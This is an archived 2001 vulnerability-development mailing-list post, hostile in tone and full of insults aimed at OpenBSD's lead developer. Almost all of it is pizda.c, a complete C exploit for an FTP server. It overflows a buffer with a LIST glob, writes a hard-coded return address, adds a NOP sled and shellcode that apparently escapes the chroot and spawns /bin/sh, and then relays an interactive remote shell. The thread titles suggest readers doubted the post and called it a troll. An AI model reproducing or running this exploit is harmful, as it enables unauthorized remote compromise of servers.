Vulnerability Development mailing list archives
Another sploit makes 2 in one day
From: Fsck Theo Deraadt <fscktheo () yahoo com>
Date: Wed, 6 Jun 2001 12:47:30 -0700 (PDT)
So openbsd'ers complained to my mail provider because
they dont like when people show them up with code to
prove they lie about things and try to hush up
everyone. Its okay though no bad feelings so here it
is in your face pizda.c
//
// Pizda.c
// Hello all I have to now post this because I keep it
low key
// for long for my love of Openbsd but after Theo lied
to all
// I decided to release this to the public domain to
show what
// all claim no one could do which is prove them wrong
so here
// it go for all to see how fast they try to fix
before some
// people see how much problems this things cause.
// copyraadt 2001 by Jigglypuff of HackMasterZ
// Theo: kurite moju trubku
//
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
extern char *optarg;
static int debug;
int cflag, lflag, sflag;
char shellcode[] =
"\x31\xc0\x50\x50\xb0\xb7\xcd\x80"
"\x58\x50\x66\x68\x2e\x2e\x89\xe1"
"\x50\x51\x50\xb0\x05\xcd\x80\x89"
"\xc3\x58\x50\x68\x61\x64\x66\x61"
"\x89\xe2\x66\x68\x6d\x01\x52\x50"
"\xb0\x88\xcd\x80\xb0\x3d\xcd\x80"
"\x53\x50\xb0\x01\x83\xc0\x0c\xcd"
"\x80\x51\x50\x31\xc9\xb1\x64\xb0"
"\x0c\xcd\x80\xe2\xfa\xb0\x3d\xcd"
"\x80\x31\xc0\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x50\x53\x50\x54\x53\xb0\x3b\x50"
"\xcd\x80\xc3";
#define THEO "THEO ftp\r\n"
#define SUXX "SUXX -user@\r\n"
void usage(const char *);
void docmd(int s, const char *cmd, int print);
void communicate(int s);
int main(int argc, char *argv[])
{
char expbuf[512] = "LIST ", *basedir, option;
char commandbuf[512] = "", *hostname;
int cnt, dirlen, explen, sendlen;
int s, port = 21, pad;
long retaddr;
struct sockaddr_in sin;
struct hostent *he;
while((option = getopt(argc, argv, "dc:l:p:s:")) !=
-1)
switch(option)
{
case 'd':
debug++;
break;
case 'c':
cflag = 1;
basedir = optarg;
break;
case 'l':
lflag = 1;
dirlen = atoi(optarg);
if(dirlen < 16)
{
usage(argv[0]);
exit(0);
}
break;
case 'p':
port = atoi(optarg);
break;
case 's':
sflag = 1;
retaddr = strtoul(optarg, 0, 0);
break;
default:
usage(argv[0]);
exit(0);
}
if(!cflag || !lflag)
{
usage(argv[0]);
exit(0);
}
if(argc - optind == 1)
hostname = argv[optind];
else
{
usage(argv[0]);
exit(0);
}
if((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
exit(1);
}
if((he = gethostbyname(hostname)) == NULL)
{
herror(hostname);
exit(0);
}
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_port = htons(port);
memcpy(&sin.sin_addr, he->h_addr_list[0],
sizeof(struct in_addr));
if(connect(s, (struct sockaddr *) &sin,
sizeof(struct sockaddr_in)) == -1)
{
perror("connect");
exit(0);
}
if(debug)
fprintf(stderr, "// basedir = \"%s\"\n", basedir);
for(cnt = 0; cnt < 1024/(dirlen+4)-1; cnt++)
strcat(expbuf, "*/../");
strcat(expbuf, "*/");
if(debug)
fprintf(stderr, "// expbuf = \"%s\"\n", expbuf);
explen = cnt*(dirlen+4) + dirlen + 1;
if(debug)
fprintf(stderr, "// explen = %d\n", explen);
sendlen = strlen(expbuf);
if(debug)
fprintf(stderr, "// sendlen = %d\n", sendlen);
docmd(s, "", 0);
docmd(s, THEO, 0);
docmd(s, SUXX, 1);
snprintf(commandbuf, sizeof(commandbuf), "CWD
%s\r\n", basedir);
docmd(s, commandbuf, 1);
pad = 1027 - explen;
if(debug)
fprintf(stderr, "// pad = %d\n", pad);
for(; pad >= 0; pad--)
strcat(expbuf, "x");
if(!sflag)
{
switch(dirlen)
{
case 16:
retaddr = 0xdfbeab60;
case 26:
retaddr = 0xdfbefe40;
default:
retaddr = 0xdfbeba20 + (dirlen-17)*0x9c0;
}
retaddr+=20;
}
fprintf(stderr, "retaddr = %.8lx\n", retaddr);
strncat(expbuf, (char *) &retaddr, 4);
for(cnt = strlen(expbuf); cnt <
508-strlen(shellcode); cnt++)
strcat(expbuf, "\x90");
strcat(expbuf, shellcode);
strcat(expbuf, "\r\n");
fprintf(stderr, "Press EnTeR.."); fflush(stderr);
fgets(commandbuf, sizeof(commandbuf)-1, stdin);
docmd(s, expbuf, 0);
fprintf(stderr, "remember Theo is a liar
\"adfa\"-dir\n");
communicate(s);
return 0;
}
void usage(const char *s)
{
fprintf(stderr, "Usage %s [-s retaddr] [-d] -c dir
-l dirlen(>=16) [-p port] hostname\n", s);
}
void docmd(int s, const char *cmd, int print)
{
char uglybuf[1024];
int len;
fd_set rfds;
struct timeval tv;
len = strlen(cmd);
if(debug)
{
write(STDERR_FILENO, "\\\\ ", 3);
write(STDERR_FILENO, cmd, len);
}
if(send(s, cmd, len, 0) != len)
{
perror("send");
exit(0);
}
FD_ZERO(&rfds);
FD_SET(s, &rfds);
tv.tv_sec = 1;
tv.tv_usec = 0;
select(s+1, &rfds, NULL, NULL, &tv);
if(FD_ISSET(s, &rfds))
{
if((len = recv(s, uglybuf, sizeof(uglybuf), 0))
< 0)
{
perror("recv");
exit(0);
}
if(len == 0)
{
fprintf(stderr, "EOF on socket. Sorry.\n");
exit(0);
}
if(debug || print)
{
write(STDERR_FILENO, "// ", 3);
write(STDERR_FILENO, uglybuf, len);
}
}
}
void communicate(int s)
{
char buf[1024];
int len;
fd_set rfds;
while(1)
{
FD_ZERO(&rfds);
FD_SET(STDIN_FILENO, &rfds);
FD_SET(s, &rfds);
select(s+1, &rfds, NULL, NULL, NULL);
if(FD_ISSET(STDIN_FILENO, &rfds))
{
if((len = read(STDIN_FILENO, buf,
sizeof(buf))) <= 0)
return;
if(send(s, buf, len, 0) == -1)
return;
}
if(FD_ISSET(s, &rfds))
{
if((len = recv(s, buf, sizeof(buf), 0)) <=
0)
return;
if(write(STDOUT_FILENO, buf, len) == -1)
return;
}
}
}
__________________________________________________
Do You Yahoo!?
Get personalized email addresses from Yahoo! Mail - only $35
a year! http://personal.mail.yahoo.com/
Current thread:
- Another sploit makes 2 in one day Fsck Theo Deraadt (Jun 06)
- Re: Another sploit makes 2 in one day Michal Zalewski (Jun 06)
- Re: Another sploit makes 2 in one day Brad Doctor (Jun 06)
- Troll (was: RE: Another sploit makes 2 in one day) Russ Spooner (Jun 07)
- <Possible follow-ups>
- Re:Another sploit makes 2 in one day security (Jun 06)